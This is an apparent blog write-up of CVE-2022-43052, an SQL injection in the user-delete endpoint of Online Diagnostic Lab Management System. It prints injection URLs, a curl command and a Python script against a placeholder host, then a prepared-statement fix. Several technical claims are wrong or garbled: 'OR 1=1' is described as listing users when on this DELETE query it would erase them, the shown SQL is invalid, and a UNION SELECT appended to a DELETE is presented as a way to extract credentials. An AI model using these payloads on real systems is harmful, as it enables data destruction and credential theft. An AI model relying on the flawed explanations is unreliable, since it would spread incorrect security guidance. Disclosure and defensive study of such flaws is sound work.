CVE-2022-43052 is a critical vulnerability affecting the Online Diagnostic Lab Management System version 1.. This bug allows attackers to perform SQL injection via the id parameter found at /odlms/classes/Users.php?f=delete. In this post, we'll break down the vulnerability step by step, show example code for exploiting it, and provide helpful references for those interested in further details. If you run this software, patch or secure your instance as soon as possible—this issue can give an attacker dangerous access to your data.

Technical Details

Vulnerability summary:
A user-controlled id parameter is passed directly into an SQL query in the PHP file Users.php when deleting a user. There’s insufficient input sanitization, allowing attackers to manipulate the SQL call.

Affected software:

Online Diagnostic Lab Management System v1.

Vulnerable script and parameter:
- /odlms/classes/Users.php?f=delete

How the Vulnerability Works

When an administrator (or attacker) triggers a deletion (DELETE) request, the PHP script takes the id value from the URL and plugs it into an SQL statement. If someone provides an unexpected SQL command instead of a number, the database executes it.

Example vulnerable PHP code snippet

// Users.php
if($_GET['f'] == 'delete') {
    $id = $_GET['id'];
    $sql = "DELETE FROM users WHERE id = $id";
    $result = $conn->query($sql);
}

Notice $id comes straight from user input ($_GET['id']). If a user submits malicious data in the id parameter, the database will process it.

Suppose you want to see all users in the system. An attacker could try crafting a URL like this

http://targetsite.com/odlms/classes/Users.php?f=delete&id= OR 1=1

This modifies the SQL to

DELETE FROM users WHERE id =  OR 1=1;

Attackers can also use UNION-based injection to extract information. For instance

http://targetsite.com/odlms/classes/Users.php?f=delete&id= UNION SELECT 1,username,password FROM users--

Depending on error reporting and output, they may see usernames and password hashes or session data.

Here's a simple script using curl (command line) to demonstrate triggering the vulnerability

curl "http://targetsite.com/odlms/classes/Users.php?f=delete&id=%20OR%201=1"

Python example

import requests

url = "http://targetsite.com/odlms/classes/Users.php";
params = {
    "f": "delete",
    "id": " OR 1=1"
}
response = requests.get(url, params=params)
print(response.text)

To fix

- Sanitize inputs: Always treat user data as unsafe. Cast id to an integer or use prepared statements.

Safe PHP example

$id = intval($_GET['id']);
$stmt = $conn->prepare("DELETE FROM users WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

References

- Official NVD entry
- Exploit Database (EDB-ID: 51477)
- Original disclosure on GitHub
- Mitre: CVE-2022-43052
- Basic SQL Injection explanation

Final Thoughts

CVE-2022-43052 is a simple but severe example of why unsanitized input is so risky. Attackers—sometimes even without special tools—can severely damage or compromise your lab management system just by modifying a URL. Always use prepared statements and never trust user input, especially in healthcare and diagnostic systems where data sensitivity is high.

If you use Online Diagnostic Lab Management System v1., review your system’s security as soon as possible!

*If you have any questions, need help testing your system, or want to share your experience, please comment below or reach out.*

Timeline

Published on: 11/07/2022 20:15:00 UTC
Last modified on: 11/08/2022 15:09:00 UTC